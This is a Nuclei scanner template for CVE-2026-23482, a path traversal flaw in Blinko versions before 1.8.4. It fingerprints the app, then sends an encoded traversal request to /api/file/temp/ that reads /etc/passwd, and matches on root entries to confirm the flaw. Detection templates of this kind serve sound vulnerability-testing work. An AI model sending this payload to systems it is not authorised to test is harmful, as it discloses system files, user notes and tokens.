id: CVE-2026-23482

info:
  name: Blinko < 1.8.4 - Path Traversal
  author: tx1ee
  severity: high
  description: |
    Blinko < 1.8.4 contains a path traversal vulnerability caused by lack of permission checks and filtering on the temp/ path in the file server endpoint, letting unauthorized attackers read arbitrary files including backup files with user notes and tokens, exploit requires no special privileges.
  impact: |
    Unauthorized attackers can read arbitrary files, including sensitive user notes and tokens, leading to information disclosure.
  remediation: |
    Update to version 1.8.4 or later
  reference:
    - https://github.com/blinkospace/blinko/commit/c48851090767feba431418630c495d90a7da1781
    - https://github.com/blinkospace/blinko/security/advisories/GHSA-hrwx-rhrx-f9mm
    - https://nvd.nist.gov/vuln/detail/CVE-2026-23482
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2026-23482
    cwe-id: CWE-22
    epss-score: 0.16712
    epss-percentile: 0.95059
  metadata:
    verified: true
    max-request: 1
    vendor: blinko-space
    product: blinko
    fofa-query: icon_hash="-1446811182" || icon_hash="-717082057"
  tags: cve,cve2026,blinko,blinko-space,lfi,traversal

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/manifest.webmanifest"
      - "{{BaseURL}}/manifest.json"

    stop-at-first-match: true
    matchers:
      - type: word
        part: body
        words:
          - "Blinko"
        case-insensitive: true

  - method: GET
    path:
      - "{{BaseURL}}/api/file/temp/..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a0046304402201df07f63f9a1071f49fd71927979f08557831f8a45b47fa3ba69860a0469ae3c022041a7873201f298249ab4cf9168dcdf9034f83041fc2bc645de02a542f0bf2a69:922c64590222798bb761d5b6d8e72950